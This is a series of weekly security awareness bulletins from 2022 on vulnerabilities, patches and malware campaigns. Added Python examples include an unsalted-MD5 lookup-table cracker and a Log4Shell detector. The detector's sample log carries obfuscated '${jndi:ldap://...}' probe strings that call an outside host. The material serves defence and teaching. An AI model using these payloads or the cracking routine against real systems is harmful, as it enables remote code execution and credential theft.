Another vulnerability that is currently being actively exploited is the vulnerability in VMware Workspace One. Therefore, make sure you stay informed about new updates and install them as soon as possible.

Updating systems and software does not only apply to the business environment, but also to devices that are intended for home or personal use. The government has now obliged sellers of digital products to keep them working and safe. This means that there will also be software updates for smart TVs, printers and cameras, for example. Also in this case: make sure you know which equipment is connected to the internet and update this equipment as soon as possible, where possible.

Furthermore, Onyx ransomware seems to destroy files larger than 2MB instead of encrypting them. According to researchers, the data in the files is overwritten with worthless data during encryption, so that decryption no longer yields the original file information even after the ransom has been paid. Since the same encryption routine has been seen with Chaos ransomware, it seems that overwriting is not a flaw in the encryption but a deliberate choice. Therefore, always ensure that you take timely action when a new vulnerability is published.

#WakeUpWednesday April 27, 2022

Among other things, cyber criminals use vulnerabilities in software to penetrate organizations. At least eighty zero-day vulnerabilities were used in 2021, more than a doubling compared to 2020. Three quarters of the zero-days discovered last year exploited vulnerabilities in products from Apple, Google and Microsoft. Therefore, install the available patches as soon as they are published.

Cisco, QNAP and Oracle, among others, released updates last week. In the case of Cisco to address a serious vulnerability in the Cisco Umbrella Virtual Appliance (VA). This vulnerability allowed attackers to remotely steal administrative credentials. QNAP has released an update for its NAS systems related to Apache HTTP vulnerabilities. Oracle has announced and fixed 520 new vulnerabilities in its April update.

Research further shows that malware groups still heavily use phishing to infiltrate. With new measures against the use of macros in Microsoft Office documents, these groups are looking for ways to get around these cybersecurity measures. Make sure your people are prepared for these phishing scams.

#WakeUpWednesday April 20, 2022

Several updates were released last week for critical vulnerabilities that are being actively exploited. Google released an emergency patch for an actively attacked zero-day vulnerability in Chrome, and Microsoft Windows and VMware Workspace ONE Access have also released patches. The advice is of course to install available patches as soon as possible.

In previous WakeUp Wednesday posts, we reported various variants of malware targeting mobile phones. Research by Proofpoint shows that in February there was a 500% increase in the number of attempts to deliver malware for mobile devices in Europe. Malware for mobile devices is becoming more sophisticated. This involves recording telephone and video calls, audio and video recordings stored on the device and destroying data stored on the device. Be alert for messages containing links, voice messages, or notifications for updating apps outside the regular app stores.

#WakeUpWednesday April 13, 2022

Mobile phones play an increasingly prominent role in our lives, both professionally and privately. Therefore, be aware of malware that targets Android devices. The Android malware Octo is a new version of ExoCompact, the source code of which was leaked in 2018. The most dangerous thing about the updated variant is that the cybercriminal can remotely take control of the device and perform malicious actions via the victim's device. Only update apps with versions released through official channels, such as the App Store or Google Play.

Another malware campaign currently seen in practice is aimed at the distribution of the new information-stealing malware META. META is growing in popularity among cybercriminals and is currently actively used in attacks. It is deployed to steal passwords stored in Chrome, Edge and Firefox as well as cryptocurrency wallets. META is distributed in the traditional way, as a mail attachment. Be alert if you receive attachments from strangers and be careful when enabling macros!

Other information-stealing malware currently in active use are FFDroider and Lightning Stealer. These also use passwords stored in Chrome, Edge and Firefox. FFDroider is distributed via cracked versions of installers and freeware with the main purpose of stealing cookies and credentials associated with popular social media and e-commerce platforms. In addition, the stolen information is used to log into the accounts in order to record other personal account-related information. Lightning stealer works in a similar way and can steal Discord tokens, cryptocurrency wallet data, and details related to cookies, passwords, and credit cards.

During the Patch Tuesday of April 2022, Microsoft released patches for 119 new vulnerabilities. The most severe vulnerability is a remote code execution vulnerability in the Remote Procedure Call Runtime, registered as CVE-2022-26809. This vulnerability allows an unauthenticated remote attacker to execute code with the same privileges as the RPC service. This service operates in the context of the system user account Network Service.

VMware has published Security Advisory VMSA-2022-0011 related to eight different CVEs in VMware Workspace ONE Access. Three of these CVEs have a score of 9.8 and are the subject of this writing: one Remote Code Execution and two Authentication Bypass vulnerabilities. The Remote Code Execution vulnerability also exists in the following related VMware products: VMware Identity Manager, VMware Cloud Foundation and vRealize Suite Lifecycle Manager.

#WakeUpWednesday April 6, 2022

Cyber incidents are often caused by critical vulnerabilities that are not adequately addressed, by configuration errors or by users inadvertently sharing their data with third parties.

Zyxel warns of a critical vulnerability that could allow cybercriminals to gain administrative access to the firewall. Install the software updates as soon as possible.

Totolink routers that have not received the latest software updates are vulnerable to a variant of the Mirai botnet. The variant called Beastmode has five new exploits, three of which target various Totolink routers. Here too, the advice is to update the software as soon as possible, where possible.

In addition to the notification for Totolink routers, there is also a warning for users of D-link routers. The vulnerability, designated CVE-2021-45382, resides in D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L. These models are end-of-life, so no new updates are released. It is therefore advised to take these models offline as soon as possible and to replace them with newer routers.

Borat, a new remote access trojan (RAT), offers cybercriminals several options for attacking. For example, Borat can be used as ransomware, spyware, for DDoS attacks. Borat offers the attacker the opportunity to choose how to deploy the malware, so be careful about which software is installed and only download applications from reliable sources and websites.

#WakeUpWednesday March 30, 2022

It is nothing new that critical vulnerabilities are used by cybercriminals to gain access to third-party systems and data. However, we see that various vulnerabilities are still being exploited, despite patches being released. Updating systems and applications is an essential part of a good cybersecurity policy.

For example, Log4j is still actively abused by cyber criminals to install backdoors that can be used at a later stage. In addition, Log4j is actively being exploited to install cryptocurrency miners on vulnerable VMware Horizon servers.

A new phishing campaign, aimed at taking over email conversations, is being used to spread the IcedID info-stealing malware. This campaign makes use of vulnerabilities in Microsoft Exchange for which software updates are already available.

Sophos has announced that the critical vulnerability in its firewall software is currently being actively exploited. A hotfix is available, we recommend installing it as soon as possible.

The number of attacks that use zero-day vulnerabilities, vulnerabilities that have not been discovered or exploited before and for which no update is yet available, doubled in 2021, according to Rapid7.

We advise you to ensure that your systems have the latest software updates, if possible. Make sure your employees are alert and use network segmentation to ensure that attackers cannot penetrate the entire company network unhindered.

#WakeUpWednesday March 23, 2022

Why do things the hard way? This is why there are many portals that allow users to log in with a Google account, Apple ID or Microsoft account. The popularity means that these types of screens are also popular with cyber criminals. They use them in their phishing campaigns. Recently, a new phishing toolkit has become available that makes it easy to counterfeit Chrome browser screens. Be careful where you log in and use multi-factor authentication if possible.

The FBI warns vital sector organizations about AvosLocker ransomware. These ransomware attacks exploit vulnerabilities in Microsoft Exchange. Updates are available for the vulnerabilities used, including ProxyShell. Make sure your systems have the latest security updates.

Qualys research shows that 30 percent of applications, servers and other systems using Log4j are still vulnerable to cyber attacks. This vulnerability puts you at risk because cyber criminals could take over your system remotely. Therefore, install the security updates if possible or take mitigating measures if updating is not possible.

At the beginning of March 2022, we saw a new variant of the Lorenz ransomware. However, there is a big difference between the files encrypted by this ransomware and files encrypted by an earlier version. The main difference: decryption is not possible after paying the ransom. However, our specialists managed to create a decryptor that can decrypt the files.

#WakeUpWednesday March 16, 2022

Cyber criminals are inventive. Time and again they find new ways to spread malware and gain access to third-party systems. In this #WakeUpWednesday, we give three examples.

For example, website contact forms are used to distribute the BazarBackdoor malware. The attacker requests a quote, which starts an e-mail conversation. Later in that conversation an ISO file is sent, supposedly containing additional information relevant to the request. By sharing this file through a file-sharing service such as WeTransfer, and by letting the recipient unpack it, the attacker tries to get around the e-mail security controls that would otherwise scan an attachment.

Additional add-ons for popular online games are also used. In this example, a YouTube channel is promoting an add-on for the popular game Valorant. Users who want to download the add-on are directed to a page where they can download a RAR file. This contains an installation file that does not install the add-on for the game, but RedLine stealer, malware that focuses on stealing passwords, among other things.

We close the list with Escobar, Android malware aimed at stealing Google Authenticator MFA codes. Escobar is an enhanced version of the Aberebot Android banking trojan. In addition to the MFA codes, the malware can also take control of the device via VNC. Its ability to record audio and use the camera lets it collect further user data, with the ultimate goal of gathering enough to take over the victim's bank account.

In addition to IT systems, OT systems are increasingly faced with cybersecurity threats. Research by Dragos shows that the number of vulnerabilities has doubled in 2021 compared to 2020. Ransomware is the biggest threat.

A Linux vulnerability affecting all kernels since version 5.8, including the kernels used by Android devices, has been disclosed under the name Dirty Pipe (CVE-2022-0847). It allows data in any file the attacker can read to be overwritten, even if the file is read-only for that user. Because this includes files such as /etc/passwd and setuid binaries, a local user can use it to obtain root privileges. Upstream fixes are in kernels 5.16.11, 5.15.25 and 5.10.102; distributions have backported these under their own version numbers. QNAP's NAS operating systems QTS and QuTS hero are also built on the Linux kernel and are therefore vulnerable.

Finally, we also keep a close eye on developments around wiper malware. A new specimen, RuRansom, is not ransomware, even though the name suggests otherwise. It too is wiper malware, which for the time being only targets systems whose IP address can be geolocated to Russia.

#WakeUpWednesday March 9, 2022

Cybercrime can aim at disrupting primary business processes or critical services. Last week, for example, the attack on a satellite network not only knocked out satellite connections; it also cut off the remote monitoring and control of 5,800 wind turbines in Germany and central Europe. The turbines themselves kept running, but they could no longer be managed remotely.

Nvidia has fallen victim to cybercrime in several ways. Besides the roughly one terabyte of data that the attackers claim to have stolen during the incident, two code-signing certificates from that data are now being used to sign malware. Even though both certificates have expired, Windows still accepts drivers signed with them, so the malware can be loaded as a driver. Finally, the stolen data is being used to pressure Nvidia into changing the firmware of specific series of graphics cards (GeForce RTX 30 Series), a change intended to benefit the crypto-mining industry, among other things.

Furthermore, vulnerabilities have been patched in Exchange Server and Android. The Exchange Server vulnerability (CVE-2022-23277) has a CVSS score of 8.8 and allows remote code execution; it affects Exchange 2013, 2016 and 2019, and an authenticated attacker can use it to execute code with elevated privileges. The Android vulnerability also allows privilege escalation; updates are available for Android 10, 11 and 12.

Install the available software updates as soon as possible. Also be aware of updates that are made available for all kinds of other systems that you have connected to the internet at home.

#WakeUpWednesday March 2, 2022

Over the past week we have seen the situation surrounding Ukraine escalate both physically and digitally. The Tesorion Threat Intelligence team has been monitoring various open sources since mid-January. We see attacks within Ukraine increasing drastically, and wiper malware has been detected, among other things. The purpose of this malware is to completely disable the affected computers. This is different from ransomware, where files are encrypted and the attackers make ransom demands: with a wiper, the files are destroyed and there is usually no way back. Therefore, be extra vigilant with e-mail messages, phone calls and approaches via social media.

The Dutch fraud helpdesk states that in the first six weeks of 2022, more than 10.5 million euros in damage has already been suffered due to CEO fraud, fake telephone calls and misuse of company names. In addition to training the cyber awareness of employees, it is also important as an organization to know what is being published about your organization, especially on the deep and dark web. Think, for example, of stolen login details with which cyber criminals can gain access to your systems.

Research by Fortinet shows, among other things, that ransomware is not only increasing, but also becoming more aggressive and devastating. In addition, the Global Threat Landscape Report shows that Linux systems are also increasingly being targeted. Make sure your organization is prepared, pay attention to increasing the cyber awareness of your employees.

#WakeUpWednesday February 23, 2022

The widely used Microsoft Teams now also appears to be used by hackers. They use the platform to spread malware. By logging in with data obtained through phishing or bought on the dark web, the hacker can share a file. As soon as this file is opened by another user, the malware starts working, with all its consequences. Make sure your employees are resilient and alert when it comes to phishing and opening unknown files.

A malicious app has been found in the Google Play Store. The app Fast Cleaner pretends to be an app that will clean up the device and thus improve battery life, while in reality it installs banking malware during an invisible update. There have already been more than 50,000 downloads of this app, despite reviews pointing out its malicious intent. Be vigilant about the apps you install and don’t simply trust everything.

The popular WordPress plugin UpdraftPlus suffers from a critical vulnerability (CVE-2022-0633) that lets any logged-in user, down to the lowest-privileged subscriber role, download the site's latest database backup, which may contain privacy-sensitive information such as user data and password hashes. Normally only administrators can download these backups. Because of the severity, WordPress.org forced the update (version 1.22.3 for the free plugin or 2.22.3 for the premium version) onto millions of websites.

In last week's update we already mentioned the vulnerability in Adobe Commerce and Magento Open Source. Since then a second vulnerability with a CVSS score of 9.8 has been found in the same products (CVE-2022-24087). It also appears that the Log4j vulnerability, which came to light at the end of 2021, is still being abused. Furthermore, VMware recently released updates for six vulnerabilities with CVSS scores ranging from 5.3 to 8.8. We keep emphasising it: keep your software and devices up to date to stay ahead of cyber attacks.

Last week the news came out that the well-known ransomware group Conti and the TrickBot group have joined forces. This strengthens their position and gives them the opportunity to develop better malware. Ransomware attacks continue to keep us busy, so protect your organisation against them.

#WakeUpWednesday February 16, 2022

Several companies have made updates available in the past week due to critical vulnerabilities. It is important to always keep your devices and software up to date, part of having your basics in order.

First of all, Apple released an update last week fixing CVE-2022-22620 in WebKit, the browser engine used by Safari and by every browser on iOS. Processing maliciously crafted web content can lead to arbitrary code execution on Apple devices through this vulnerability. Update your devices to the latest software versions to avoid being vulnerable. Adobe also released an update for a critical vulnerability known as CVE-2022-24086 in Adobe Commerce and Magento Open Source. Lastly, Google has released an update for the Chrome browser. Chrome installs it automatically over time, but you can trigger it manually now. It fixes several vulnerabilities, some of which have been rated critical.

A German group of hackers, the Chaos Computer Club, recently found more than 50 data leaks at various companies and organisations, including the Dutch Ministry of Health, Welfare and Sport. By means of various vulnerabilities, including database servers without authentication and unsecured MySQL servers, the hackers were able to access all kinds of personal data. All data breaches have been reported to the companies concerned and most of them have taken action to resolve the vulnerabilities. The group did not make use of the data found, but unfortunately this often happens. Make sure you protect your data, for example by using encryption, and do not become a victim of a data breach.

#WakeUpWednesday February 9, 2022

With the attacks on several companies in the oil industry and an attack on freight handler Swissport, there is currently a lot of activity in the field of ransomware again. The impact of the attacks on business processes is significant. Loading and unloading ships is not possible or is subject to significant delays. Also at Swissport, part of the IT systems for scheduling personnel, aircraft and freight are temporarily unavailable.

In recent weeks, much has been said and written about the mandatory app for Olympic athletes, counselors and journalists. In addition to the advice to leave your own devices at home and not to take them to China, it is good to be aware of possible risks in the field of cybersecurity.

Be aware of the information you share, including on business platforms such as LinkedIn. Information such as your job description, information about systems and applications used can be used by cyber criminals. According to the AIVD, for example, Chinese and Russian secret services have approached thousands of employees at Dutch high-tech companies with the aim of corporate espionage.

#WakeUpWednesday February 2, 2022

Updating applications and systems is essential for your cybersecurity. For example, the Apache Log4j vulnerability is currently being actively exploited. Furthermore, a weakness in Microsoft Defender lets any local user read which paths are excluded from scanning, so malware placed there evades detection.

We continue to emphasize that installing security updates is extremely important. However, criminals also abuse this by offering fake updates for software that actually contain malware or ransomware. Microsoft Edge users, for example, were confronted with a fake update, as were users of Adobe software, Google Chrome and Firefox. So always make sure that you only download updates from the supplier itself and not from another party.

Ransomware is a major threat to the continuity of business processes and thus to the existence of an organization. In addition to holding the data hostage, organizations are put under pressure by the threat that the data will be made public. To reinforce that threat even more, social media is now also being used. This puts even more pressure on organizations to pay the ransom.

Another rather daring and unorthodox method that has recently been deployed is to call individuals whose details have been found in the data set held hostage. They were put under pressure with the aim of motivating the organization whose data had been held hostage to pay.

#WakeUpWednesday January 26, 2022

Data is valuable, also for cyber criminals. No organization is spared, as became apparent from the hack on the Red Cross. Data on more than 500,000 people, many of them highly vulnerable, was stolen.

In addition, cyber criminals have managed to use more than 2,000 corporate email accounts in various spyware campaigns. Kaspersky’s investigations revealed that the spyware was distributed via an email attachment. If the employee opens the attachment and the spyware successfully infects the system, the username and password of the employee in question are sent to the cyber criminal. The attacker can gain access to the system with the stolen data and then further spread the spyware among the employee’s contacts.

Known vulnerabilities used by cyber criminals at a later date are not new. In early December, we warned about critical vulnerabilities in the SonicWall SMA 100 series. A warning was issued this week that these vulnerabilities are currently being actively exploited. There is no workaround available, the advice is to update the software as soon as possible.

Logging is important, for example, to find out how cyber criminals got in. Nevertheless, Cisco research shows that due to a lack of logging, the attack vector is unknown in most incidents. Where the attack vector is known, in most cases the cause appears to be phishing, or applications that are accessible via the internet. Train the cyber awareness of your employees and ensure that vulnerabilities in the software are fixed as soon as an update is available.

#WakeUpWednesday January 19, 2022

In the #WakeUpWednesday we regularly report incidents where there is a need and urgency around patching. Incidents are also regularly discussed where increasing awareness can help increase cyber security.

Over the past week the Apache Software Foundation, which maintains Apache Log4j, OpenOffice and the Apache HTTP Server among other projects, warned against the use of end-of-life software: users are still being attacked through old vulnerabilities in Apache software that is no longer supported or maintained.

Updates have also been released for cryptsetup, the software behind LUKS disk encryption on Linux. It contained a critical vulnerability (CVE-2021-4122) in the LUKS2 online re-encryption feature: an attacker with physical access to the device could modify the LUKS2 header so that, the next time the legitimate user unlocks the volume, part of it is silently decrypted on disk, without the attacker ever entering the passphrase. The fix is in cryptsetup 2.4.3. It is also a reminder that making backups, and making sure they cannot be changed afterwards, is one of the basic measures within cybersecurity.

Due to the combination of a weak administrator password and weak password storage (unsalted MD5 hashes, which a lookup table reverses for most users in seconds), private data of nearly 7 million users of the Open Subtitles website has been stolen and made public. The e-mail addresses have been added to the data breach search engine Have I Been Pwned.
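To show why unsalted MD5 turns a leaked user table into plaintext passwords, here is an added example (not code from the original post or from Open Subtitles). It contrasts the weak scheme with a salted, slow KDF (PBKDF2-HMAC-SHA256 from the standard library). The "leaked" table and the word list are constructed; the iteration count is an assumption to tune to your own hardware budget.

```python
"""Unsalted MD5 versus a salted, slow password hash.

Added example, not part of the original post. The LEAKED table and WORDLIST
below are constructed for illustration.
"""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional

PBKDF2_ITERATIONS = 600_000  # assumption: raise or lower to fit your CPU budget


def md5_unsalted(password: str) -> str:
    """The weak scheme: the same password gives the same hash for every user,
    and a single GPU tries hundreds of millions of guesses per second."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_with_lookup_table(leaked: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """One hash per candidate word recovers every user who chose that word,
    no matter how many users there are. Returns {user: password}."""
    table = {md5_unsalted(word): word for word in wordlist}
    return {user: table[h] for user, h in leaked.items() if h in table}


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """The stronger scheme: a random per-user salt plus a deliberately slow KDF.
    Stored as 'iterations$salt$digest' so the work factor can be raised later."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


# Constructed "leaked" user table, stored the way an unsalted-MD5 site would store it.
LEAKED = {
    "alice": md5_unsalted("password123"),
    "bob": md5_unsalted("letmein"),
    "carol": md5_unsalted("password123"),  # identical hash to alice, visible before any cracking
    "dave": md5_unsalted("x7#Qm!2pLz9v"),  # not in the word list, survives this attack
}
WORDLIST = ["123456", "password", "password123", "letmein", "qwerty"]

if __name__ == "__main__":
    print(crack_with_lookup_table(LEAKED, WORDLIST))
    stored = hash_password("password123")
    print(verify_password("password123", stored), verify_password("letmein", stored))
```

Note that two users with the same password get different salted hashes, so a lookup table built once cannot be reused across users, and each guess costs the attacker the full iteration count.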

#WakeUpWednesday January 12, 2022

The Log4j vulnerability affects many systems. The British health service (NHS), for example, warns about abuse of the vulnerability in VMware Horizon, whose Tomcat-hosted web components include a vulnerable Log4j. Although VMware released patches in December, attackers are actively scanning for servers that do not yet have them.
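Several entries above (the miners on VMware Horizon, the Qualys figure of 30 percent still vulnerable, and this one) come down to the same question for a defender: are Log4Shell probes hitting my servers? The detector below is an added example, not code from the original post or from any vendor tooling. It folds the obfuscated lookup forms that Log4j 2 itself evaluates (`${lower:...}`, `${upper:...}`, the default-value form `${key:-x}`) and URL decoding, then looks for the resulting `${jndi:` marker. The access-log lines are constructed, using documentation IP ranges.

```python
"""Detect Log4Shell (CVE-2021-44228) probe strings in web server access logs.

Added example, not part of the original post. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: the inner text contains no further braces.
_INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# What we ultimately look for once the decoys have been folded away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold_lookup(match):
    """Evaluate one obfuscation lookup the way Log4j 2 would, or leave it alone.

    Before the outer ${jndi:...} lookup runs, Log4j 2 resolves inner
    ${lower:X}, ${upper:X} and default-value ${key:-X} forms (for example
    ${::-j} or ${env:NOPE:-j}), so a detector has to fold them the same way.
    """
    inner = match.group(1)
    key, _, value = inner.partition(":")
    key = key.strip().lower()
    if key == "jndi":
        return match.group(0)            # the marker we want to keep
    if ":-" in inner:
        return inner.split(":-", 1)[1]   # ${anything:-literal} -> literal
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    return match.group(0)                # unknown lookup: keep as is


def normalize(text: str) -> str:
    """URL-decode (repeatedly) and fold nested lookups until nothing changes."""
    s = text
    for _ in range(3):                   # tolerate double or triple encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    while True:                          # each pass removes at least one ${...}
        folded = _INNERMOST.sub(_fold_lookup, s)
        if folded == s:
            return s
        s = folded


def is_log4shell_probe(text: str) -> bool:
    return _JNDI.search(normalize(text)) is not None


def scan_access_log(lines):
    """Return (line_number, normalized_line) for every line carrying a probe."""
    return [(n, normalize(line)) for n, line in enumerate(lines, start=1)
            if is_log4shell_probe(line)]


# Constructed sample access log (Apache combined format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2022:08:01:10 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jan/2022:08:01:11 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [12/Jan/2022:08:01:12 +0100] "GET /login HTTP/1.1" 200 99 "-" "${${lower:j}${upper:n}di:ldap://198.51.100.9/x}"',
    '203.0.113.9 - - [12/Jan/2022:08:01:13 +0100] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.9%2Fy%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.10 - - [12/Jan/2022:08:01:14 +0100] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, normalized in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {normalized}")
```

A hit only proves someone probed you, not that the lookup was evaluated; confirm exploitation by looking for outbound LDAP or RMI connections from the application host to the address in the payload.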

A new vulnerability has been discovered in the H2 database console. Like Log4Shell, it stems from loading JNDI classes from a remote, attacker-controlled server, the same root cause behind Log4Shell. Because the H2 database engine is also widely used, the reach is potentially large, although the console that exposes the flaw is only started on request and, by default, accepts connections from localhost only unless it has explicitly been configured to allow remote access. The vulnerability (CVE-2021-42392) affects H2 versions 1.1.100 to 2.0.204; update to version 2.0.206 as soon as possible.
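Both this entry and the Dirty Pipe entry of 16 March give an affected version range, and both ranges have a trap: Dirty Pipe was fixed in three separate stable branches, so a naive "lower than 5.16.11" comparison wrongly flags 5.15.25 and 5.10.102 as vulnerable. The check below is an added example, not code from the original post, from the kernel project or from H2. The fixed kernel versions (5.16.11, 5.15.25, 5.10.102) are the upstream ones; distributions backport the fix without changing the upstream version number, so a "vulnerable" result for a distribution kernel (Ubuntu's 5.13.0-35 style versions, for instance) must be confirmed against that distribution's advisory.

```python
"""Version-range checks for Dirty Pipe (CVE-2022-0847) and the H2 console flaw
(CVE-2021-42392).

Added example, not part of the original post. Upstream view only: distribution
kernels carry backported fixes under their own version numbers.
"""
import re
from typing import Tuple

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    """'5.15.25-generic' -> (5, 15, 25); a missing patch level counts as 0."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"not a version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


DIRTY_PIPE_INTRODUCED: Version = (5, 8, 0)
DIRTY_PIPE_FIXED_IN_MAINLINE: Version = (5, 17, 0)
# Stable branches that received a backported fix, keyed by (major, minor).
DIRTY_PIPE_FIXED_STABLE = {
    (5, 10): (5, 10, 102),
    (5, 15): (5, 15, 25),
    (5, 16): (5, 16, 11),
}


def kernel_vulnerable_to_dirty_pipe(uname_release: str) -> bool:
    """True when the upstream version lies in a vulnerable range.

    The comparison is done per stable branch: 5.15.25 is fixed although it
    is lower than 5.16.11. Branches that never got a fix (5.8, 5.9,
    5.11 to 5.14) are end-of-life and stay vulnerable at every patch level.
    """
    v = parse_version(uname_release)
    if v < DIRTY_PIPE_INTRODUCED or v >= DIRTY_PIPE_FIXED_IN_MAINLINE:
        return False
    fixed = DIRTY_PIPE_FIXED_STABLE.get(v[:2])
    return True if fixed is None else v < fixed


H2_FIRST_AFFECTED: Version = (1, 1, 100)
H2_LAST_AFFECTED: Version = (2, 0, 204)


def h2_console_vulnerable(h2_version: str) -> bool:
    """True for H2 builds in the affected range. Reachability still depends on
    the H2 console being started and listening on a non-loopback interface;
    a vulnerable library-only deployment should be upgraded all the same."""
    return H2_FIRST_AFFECTED <= parse_version(h2_version) <= H2_LAST_AFFECTED


if __name__ == "__main__":
    import platform
    if platform.system() == "Linux":
        release = platform.release()
        verdict = "in vulnerable range" if kernel_vulnerable_to_dirty_pipe(release) else "not in range"
        print(f"{release}: {verdict} (confirm against your distribution's advisory)")
```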

During the January Patch Tuesday, Microsoft released patches for 96 new vulnerabilities. The most severe is a remote code execution vulnerability in the HTTP protocol stack (http.sys), registered as CVE-2022-21907, which an unauthenticated attacker can trigger by sending a specially crafted request or response. On Windows Server 2019 and Windows 10 version 1809 the vulnerable code path is only reachable if HTTP trailer support has been enabled through the EnableTrailerSupport registry value under HKLM\System\CurrentControlSet\Services\HTTP\Parameters; newer Windows versions are vulnerable by default. Check whether your products are listed and apply the patches, or the workaround, as soon as possible.

It is no surprise that cybercriminals are always looking for new methods to penetrate organizations. Nowadays, for example, USB sticks are sent that are very similar in terms of stick and packaging to those of reputable organizations. However, the USB sticks sent contain malware in order to start malicious actions.

The makers of the FluBot malware, an Android trojan that targets financial data, have launched a number of new campaigns to spread it. Be alert for messages about, for example, updating Adobe Flash Player, fake software updates offered outside the Play Store, or package deliveries. Most characteristic is that these messages contain a link that does not lead to the domain of the organization they claim to come from.

#WakeUpWednesday January 5, 2022

2022 is off to a good start, also in the field of cybersecurity. Google has released a security update for Chrome. Among other things, this new update resolves a critical vulnerability that could allow an attacker to execute arbitrary code on a user’s system without requiring further user action. Executing code naturally enables an attacker to install malware on your computer that can, for example, be used to steal credit card and login details.

Cyber criminals carried out a supply-chain attack on more than 100 companies by adding skimmer code to the video player of a cloud video hosting service. Every website that embedded the player loaded the malicious code along with it, and the credit card data of its visitors could then be stolen. Scripts loaded from third parties run with the full privileges of the page that embeds them; keep an inventory of them and use a Content-Security-Policy to restrict where the page may send data.

Cyber security has many aspects. One of the basic measures is making backups and being able to restore them. Determining a backup strategy is therefore part of a business continuity plan: know how long your organization, or a part of it, may be unavailable (Recovery Time Objective) and how much data loss is acceptable (Recovery Point Objective), and test the restore process regularly to avoid unpleasant surprises. In December, for example, Kyoto University lost 77 TB of research data due to an error in its backup system.
